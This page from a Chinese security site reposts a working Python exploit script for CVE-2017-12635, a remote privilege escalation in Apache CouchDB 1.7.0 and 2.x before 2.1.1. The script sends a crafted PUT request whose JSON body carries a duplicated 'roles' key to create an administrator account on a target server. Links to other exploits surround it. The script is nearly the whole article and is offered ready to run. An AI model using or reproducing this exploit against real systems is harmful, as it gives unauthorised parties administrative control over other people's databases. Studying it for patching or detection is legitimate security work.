首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation 来源：@r4wd3r 作者：r4wd3r 发布时间：2018-04-24   # Exploit Title: Apache CouchDB JSON 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation # Date: 2017-08-07 # Exploit Author: Sebastián Castro @r4wd3r # Vendor Homepage: https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/ # Software Link: http://couchdb.apache.org/ # Version: Apache CouchDB 1.7.0 and 2.x before 2.1.1 # CVE : CVE-2017-12635   #!/usr/bin/env python   import argparse import re import sys import requests   parser = argparse.ArgumentParser(     description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +     ' (CVE-2017-12635)') parser.add_argument('host', help='Host to attack.', type=str) parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984') parser.add_argument('-u', '--user', help='Username to create as admin.',                     type=str, default='couchara') parser.add_argument('-P', '--password', help='Password of the created user.',                     type=str, default='couchapass') args = parser.parse_args()   host = args.host port = args.port user = args.user password = args.password   pat_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$") if not pat_ip.match(host):     print "[x] Wrong host. Must be a valid IP address."     sys.exit(1)   print "[+] User to create: " + user print "[+] Password: " + password print "[+] Attacking host " + host + " on port " + port   url = 'http://' + host + ':' + port   try:     rtest = requests.get(url, timeout=10) except requests.exceptions.Timeout:     print "[x] Server is taking too long to answer. Exiting."     sys.exit(1) except requests.ConnectionError:     print "[x] Unable to connect to the remote host."     sys.exit(1)   # Payload for creating user cu_url_payload = url + "/_users/org.couchdb.user:" + user cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'   try:     rcu = requests.put(cu_url_payload, data=cu_data_payload) except requests.exceptions.HTTPError:     print "[x] ERROR: Unable to create the user on remote host."     sys.exit(1)   if rcu.status_code == 201:     print "[+] User " + user + " with password " + password + "successfully created."     sys.exit(0) else:     print "[x] ERROR " + rcu.status_code + ": Unable to create the user on remote host."   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Kaspersky KSN Remote Code Exec ·PRTG Network Monitor < 18.1.39 ·lastore-daemon D-Bus Privilege ·Interspire Email Marketer < 6. ·ASUS infosvr Authentication By ·VLC Media Player/Kodi/PopcornT ·Chrome V8 JIT NodeProperties:: ·Ericsson-LG iPECS NMS A.1Ac - ·Microsoft Internet Explorer 11 ·R 3.4.4 - Local Buffer Overflo ·VX Search 10.6.18 - 'directory ·Allok Video to DVD Burner 2.6.   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved